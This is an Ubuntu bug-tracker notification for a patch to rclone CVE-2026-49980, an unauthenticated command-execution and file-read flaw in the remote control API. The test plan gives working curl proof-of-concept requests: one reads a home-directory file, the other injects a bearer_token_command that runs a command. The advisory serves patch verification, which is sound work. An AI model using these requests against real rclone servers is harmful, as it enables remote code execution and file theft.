*** This bug is a security vulnerability *** Public security bug reported:
[ Impact ] CVE-2026-49980 describes an unauthenticated remote command execution vulnerability in the rclone remote control (RC) API. An unauthenticated network attacker who can reach the RC HTTP listener can execute commands as the rclone process user and read arbitrary files. [1] https://github.com/rclone/rclone/security/advisories/GHSA-qw24-gh76-8rvv [2] https://github.com/rclone/rclone/commit/2326ea79f7dd93de1f7ba15f02353d40995f06a8 [3] https://github.com/rclone/rclone/commit/53f972830c1747cb9636a6342c5308e55672c375 [ Test Plan ] sudo apt install rclone gridsite-clients rclone rcd --rc-addr :5572 --rc-serve # Read arbitrary files backend=`urlencode ["${HOME}"]` curl -sS -X GET "http://127.0.0.1:5572/${backend}/.bash_logout" # Execute arbitrary commands backend=`urlencode "[:webdav,url=blah,vendor=other,bearer_token_command='/usr/bin/touch /tmp/rclone_fsget_rce_poc_marker':]"` curl -sS -X GET "http://127.0.0.1:5572/${backend}/" stat /tmp/rclone_fsget_rce_poc_marker # Note that the rcd server must be restarted after the first request in order for # bearer_token_command to be executed again [ Where problems could occur ] The fix disables inline-specified remote paths for unauthenticated users when using rcd [1]. Users relying on this functionality will experience a regression. [1] https://rclone.org/docs/#syntax-of-remote-paths [ Other information ] 53f9728 (the second fix listed in the GHSA) fixes a bug that was introduced in 3c596f8 (>1.71.0, https://github.com/rclone/rclone/pull/8699); that commit should be skipped for all versions of rclone currently available in Ubuntu. ** Affects: rclone (Ubuntu) Importance: Medium Assignee: Wesley Hershberger (whershberger) Status: In Progress ** Affects: rclone (Ubuntu Focal) Importance: Undecided Status: New ** Affects: rclone (Ubuntu Jammy) Importance: Undecided Assignee: Wesley Hershberger (whershberger) Status: In Progress ** Affects: rclone (Ubuntu Noble) Importance: Undecided Assignee: Wesley Hershberger (whershberger) Status: In Progress ** Affects: rclone (Ubuntu Resolute) Importance: Undecided Assignee: Wesley Hershberger (whershberger) Status: In Progress ** Affects: rclone (Ubuntu Stonking) Importance: Medium Assignee: Wesley Hershberger (whershberger) Status: In Progress ** Also affects: rclone (Ubuntu Stonking) Importance: Medium Assignee: Wesley Hershberger (whershberger) Status: In Progress ** Also affects: rclone (Ubuntu Resolute) Importance: Undecided Status: New ** Also affects: rclone (Ubuntu Noble) Importance: Undecided Status: New ** Also affects: rclone (Ubuntu Jammy) Importance: Undecided Status: New ** Also affects: rclone (Ubuntu Focal) Importance: Undecided Status: New ** Changed in: rclone (Ubuntu Jammy) Assignee: (unassigned) => Wesley Hershberger (whershberger) ** Changed in: rclone (Ubuntu Noble) Assignee: (unassigned) => Wesley Hershberger (whershberger) ** Changed in: rclone (Ubuntu Resolute) Assignee: (unassigned) => Wesley Hershberger (whershberger) ** Changed in: rclone (Ubuntu Jammy) Status: New => In Progress ** Changed in: rclone (Ubuntu Noble) Status: New => In Progress ** Changed in: rclone (Ubuntu Resolute) Status: New => In Progress -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/2160382 Title: CVE-2026-49980 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/rclone/+bug/2160382/+subscriptions -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
